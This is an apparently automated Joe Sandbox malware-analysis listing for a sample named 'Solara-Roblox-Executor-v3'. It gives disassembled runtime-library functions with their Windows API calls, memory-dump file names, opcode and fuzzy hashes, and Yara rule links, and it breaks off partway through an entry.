Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: Find$CloseFile$AllocFirstHeapNext
String ID:
API String ID: 2701053895-0
Opcode ID: 029254f4cd31bcd3fbf7f4566ae91026b4ffd85b92d46f16196d86cc013778a3
Instruction ID: 47d19c67f9ef9d8f36638e57397ed2295075540668edb5bcb1033b1445549897
Opcode Fuzzy Hash: 029254f4cd31bcd3fbf7f4566ae91026b4ffd85b92d46f16196d86cc013778a3
Instruction Fuzzy Hash: C951587590210CAFDF269F389CA5ABEF7ADDF89704F1441A9F41997281EB308D819F60

Function 0030AFF0 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 0030594A: GetLastError.KERNEL32(00000000,?,00307CCD), ref: 0030594E
Part of subcall function 0030594A: SetLastError.KERNEL32(00000000,?,?,00000028,00301F93), ref: 003059F0

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0030B044

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 48ecee8148b985b0ea577fb54c497fdea0ae58ddc5f07c9167cb1b4af2cfedda
Instruction ID: 1dfe57a3ceb625f0e6c8096e3863638d89a3bf594b32ec392f17138e7cee5ff9
Opcode Fuzzy Hash: 48ecee8148b985b0ea577fb54c497fdea0ae58ddc5f07c9167cb1b4af2cfedda
Instruction Fuzzy Hash: B021C572646106ABDB2A9A24DC62EBBB3ACEF44310F10407AFD12C61C1EB74DD44CB50

Function 002FDDE2 Relevance: 1.6, Strings: 1, Instructions: 318COMMON

Download Yara Rule

Strings

0, xrefs: 002FDF66

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: e4c4450b4a8b9eed1721212daa96d6f41bd46d3ec0c36c024503fee68894c27b
Instruction ID: bc3f087d3eca54abdbaac494360f906511ba1962799535eec03745bf06063206
Opcode Fuzzy Hash: e4c4450b4a8b9eed1721212daa96d6f41bd46d3ec0c36c024503fee68894c27b
Instruction Fuzzy Hash: 26B1D23092060F8BCF258F688555ABEF7B2AF11380F14063DD797AB691DB71A922CB51

Function 0030B110 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 0030594A: GetLastError.KERNEL32(00000000,?,00307CCD), ref: 0030594E
Part of subcall function 0030594A: SetLastError.KERNEL32(00000000,?,?,00000028,00301F93), ref: 003059F0

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0030B164

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 4d58f61ad859aec33fc0f5ccc69253ebe2413a6c4f134e4d83277381ae51eafc
Instruction ID: 9f8228e2a48faf9de02e119cb306d2584f1304e29b75cc4d5259a3da5ced33d7
Opcode Fuzzy Hash: 4d58f61ad859aec33fc0f5ccc69253ebe2413a6c4f134e4d83277381ae51eafc
Instruction Fuzzy Hash: 2911E972652206ABD719AB28DC62DBBB7ECEF05320B10417AF506DB181EB34ED058B90

Function 0030AC88 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0030594A: GetLastError.KERNEL32(00000000,?,00307CCD), ref: 0030594E
Part of subcall function 0030594A: SetLastError.KERNEL32(00000000,?,?,00000028,00301F93), ref: 003059F0

EnumSystemLocalesW.KERNEL32(0030AD30,00000001,00000000,?,-00000050,?,0030AB13,00000000,-00000002,00000000,?,00000055,?), ref: 0030ACFA

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 1036d039b01938b0e5aa699f4384b08aa97a19a9209e1b84bab6dc83b874ad37
Instruction ID: 5eb80dc6174e224cbabfe28faa65445635426ff96b84a26be446fee3c2ffce24
Opcode Fuzzy Hash: 1036d039b01938b0e5aa699f4384b08aa97a19a9209e1b84bab6dc83b874ad37
Instruction Fuzzy Hash: E31129372017015FDB189F39D8B16BAB791FF80729B19842CE94687B80D7717842CB40

Function 0030B2BD Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 0030594A: GetLastError.KERNEL32(00000000,?,00307CCD), ref: 0030594E
Part of subcall function 0030594A: SetLastError.KERNEL32(00000000,?,?,00000028,00301F93), ref: 003059F0

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0030AF4C,00000000,00000000,?), ref: 0030B2E9

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 59d52c7f5983113cd5991407241461494001ac037818722a3a56e272592c5131
Instruction ID: f27be8ed7cb8b81f80e17869f9eae7e0e9fd84c275619741e544470c4683459e
Opcode Fuzzy Hash: 59d52c7f5983113cd5991407241461494001ac037818722a3a56e272592c5131
Instruction Fuzzy Hash: 2F01FE3A611112EBDB195B248C26AFAB758EB40754F654468EC46A71C0DB30FE41C590

Function 0030AF83 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0030594A: GetLastError.KERNEL32(00000000,?,00307CCD), ref: 0030594E
Part of subcall function 0030594A: SetLastError.KERNEL32(00000000,?,?,00000028,00301F93), ref: 003059F0

EnumSystemLocalesW.KERNEL32(0030AFF0,00000001,?,?,-00000050,?,0030AADB,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 0030AFCD

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: b9c68ef3a40624e4c3e70294a31b6712b3142925c15aa263e4d6ea57481744b2
Instruction ID: 23ec9a52bf8a21271febfbfdae075ca924fdd9f3fb0308f3357f8c63b50a6811
Opcode Fuzzy Hash: b9c68ef3a40624e4c3e70294a31b6712b3142925c15aa263e4d6ea57481744b2
Instruction Fuzzy Hash: DEF046763017055FCB265F39ECA1A7ABB91EF80368F16842CF9064B6C0C7719C02CA10

Function 003068FD Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00301D11: EnterCriticalSection.KERNEL32(?,?,00305DD8,?,0031FC38,00000008,00305CCA,00000000,00000000,?), ref: 00301D20

EnumSystemLocalesW.KERNEL32(003068F0,00000001,0031FCB8,0000000C,003062F1,-00000050), ref: 00306935

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 2741c26a26702233379e47992b7cbe0f45a9c7683f329bf73ad87f43fdd88ee9
Instruction ID: 512f36a8270ed87dbb7cac88953f9dca0844cf3a749e260561912b51f5c9e23f
Opcode Fuzzy Hash: 2741c26a26702233379e47992b7cbe0f45a9c7683f329bf73ad87f43fdd88ee9
Instruction Fuzzy Hash: FDF04936A00208EFD712DFA8E952BADB7F4EB08721F10812AF5209B2E1CB755955CF80

Function 0030B0C5 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0030594A: GetLastError.KERNEL32(00000000,?,00307CCD), ref: 0030594E
Part of subcall function 0030594A: SetLastError.KERNEL32(00000000,?,?,00000028,00301F93), ref: 003059F0

EnumSystemLocalesW.KERNEL32(0030B110,00000001,?,?,?,0030AB35,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 0030B0FC

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 34616dbfdc8fb540d2655a67be860dce9b35c2e55b81287372ff31b52167267b
Instruction ID: 26a2b36cdf87adc1ac710c31cb0256528799d3efe24ac437ba909a455e1b196f
Opcode Fuzzy Hash: 34616dbfdc8fb540d2655a67be860dce9b35c2e55b81287372ff31b52167267b
Instruction Fuzzy Hash: F2F0E53630020957CB0A9F39DC65AABBF94EFC5761F0B4058EA098B6D0C7759842CB90

Function 003063F5 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,00300A63,?,20001004,00000000,00000002,?,?,002FF971), ref: 00306429

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 025c6cca9fd08af728ec19fcab9c9fffebc209cd3cd6b2ab4cb4e1dee9f9a461
Instruction ID: f2dba6805fae48a4869294edd956679c260fedddd3cc09b2f02b2da2c2470c40
Opcode Fuzzy Hash: 025c6cca9fd08af728ec19fcab9c9fffebc209cd3cd6b2ab4cb4e1dee9f9a461
Instruction Fuzzy Hash: 4CE04F3250111CBBCF132F61DC16EAE7E2AEF48B50F048020FD066A1A9CB328930AA91

Function 002F9A67 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00009B90), ref: 002F9A6C

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 2c7afb3b8b99802309b718f8794d9e917c829c407dd448784a4c79c5fd9d0faa
Instruction ID: 608eed39b5bb6985826acd1f336b1fca7a42038815dfd8fbd5504c375d9dce1f
Opcode Fuzzy Hash: 2c7afb3b8b99802309b718f8794d9e917c829c407dd448784a4c79c5fd9d0faa
Instruction Fuzzy Hash:

Function 00307020 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00307020

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 98aa76694d1fc415001f5e1e6474a41e6ca3555b069cf609e7f408f934897c9e
Instruction ID: b8271a3aec6411ff659e3dd371e9b2e5e9e4fcac9a63abe54a9de5af68863186
Opcode Fuzzy Hash: 98aa76694d1fc415001f5e1e6474a41e6ca3555b069cf609e7f408f934897c9e
Instruction Fuzzy Hash: 81A02430100111CF53014F315F04F4C37DCD5057D0F04C05CD410C1070D73040405F00

Function 002F1BA0 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aff3a28be8aa614b549e54a24693082d5edc653d46a31111da9f4dea998926b8
Instruction ID: 314fd1c7d32e4a876e559bf8cfbf360e744af3324917b5a31b5097b4a9f7e7b7
Opcode Fuzzy Hash: aff3a28be8aa614b549e54a24693082d5edc653d46a31111da9f4dea998926b8
Instruction Fuzzy Hash: C7D0923A641A58AFC211DF4AE440D41F7BCFB9E770B154166EA4893B20C331FC12CAE0

Function 003141D2 Relevance: 12.2, APIs: 8, Instructions: 248COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(027805F8,027805F8,00000000,7FFFFFFF,?,003141BD,027805F8,027805F8,00000000,027805F8,?,?,?,?,027805F8,00000000), ref: 00314278
__alloca_probe_16.LIBCMT ref: 00314333
__alloca_probe_16.LIBCMT ref: 003143C2
__freea.LIBCMT ref: 0031440D
__freea.LIBCMT ref: 00314413
__freea.LIBCMT ref: 00314449
__freea.LIBCMT ref: 0031444F
__freea.LIBCMT ref: 0031445F

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: 94b257b404c86832abb627468ecaf1d59e8216818ed1db8e46c2c26b96a37bd5
Instruction ID: deafa06ac2bc7d9666ee728d5b712a439a775c4b80e44c9deb9a0355c0cfb9f0
Opcode Fuzzy Hash: 94b257b404c86832abb627468ecaf1d59e8216818ed1db8e46c2c26b96a37bd5
Instruction Fuzzy Hash: 0871E3329002499BDF2A9E95CC41BFF7BA9AF4D750F2A0469F914BB281DA359CC18B50

Function 003085B6 Relevance: 10.8, APIs: 7, Instructions: 329COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0030863C

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: b258c23f8f5adf4b5b829db56bad2fb8a7efe0f2db3ca2ba46b92337591bc9f9
Instruction ID: 0681bc504546505fd2062856053beaf49c29e4e7ca0129c5f9872ae847f0e050
Opcode Fuzzy Hash: b258c23f8f5adf4b5b829db56bad2fb8a7efe0f2db3ca2ba46b92337591bc9f9
Instruction Fuzzy Hash: B8B168329023559FDB178F28CCA1BEEBBA5EF55710F258165E984AF2C2DB74D801C7A0

Function 00304D4C Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 301COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00304E6B
CallUnexpected.LIBVCRUNTIME ref: 003050E4

Strings

csm, xrefs: 00304EA2
xf1, xrefs: 00304E62
csm, xrefs: 00304D89
csm, xrefs: 00304DF6

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: CallUnexpectedtype_info::operator==
String ID: csm$csm$csm$xf1
API String ID: 2673424686-3925582995
Opcode ID: d887cadcedc2e3b39ec5782712b2c19715057a8d36884e887ad43fcc82a8e552
Instruction ID: 2abc048214e0d54a82fd9756429a194f7da16b711221aba0b6d07c22957d0397
Opcode Fuzzy Hash: d887cadcedc2e3b39ec5782712b2c19715057a8d36884e887ad43fcc82a8e552
Instruction Fuzzy Hash: 08B18EB1802209EFCF16DFA4C8619AFB7B5FF04300F15456AEA146B292D771DA61CF91

Function 002FABB0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 002FABE7
___except_validate_context_record.LIBVCRUNTIME ref: 002FABEF
_ValidateLocalCookies.LIBCMT ref: 002FAC78
__IsNonwritableInCurrentImage.LIBCMT ref: 002FACA3
_ValidateLocalCookies.LIBCMT ref: 002FACF8

Strings

csm, xrefs: 002FAC8D

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 7c899a1a01531eea94985670a35347b987e9bcf83493a61184a7444ba776160e
Instruction ID: 56d6be585b488bd76e0bdfca6849cfb0b9a6b9b2ded52928ee3ea945301bf2c8
Opcode Fuzzy Hash: 7c899a1a01531eea94985670a35347b987e9bcf83493a61184a7444ba776160e
Instruction Fuzzy Hash: 5F41F870A1121D9BCF11DF68C845AAEBBB5BF04364F148166E9189F392C731DD11CF92

Function 00312E9C Relevance: 9.3, APIs: 6, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9bdac0f150399a84f965b2506ed2d360b146b621ea2316c219770fa520c5d6d
Instruction ID: 59b80e2238a563632371cb9d183575159ee21c0602e13858a87bee7d0f0f285f
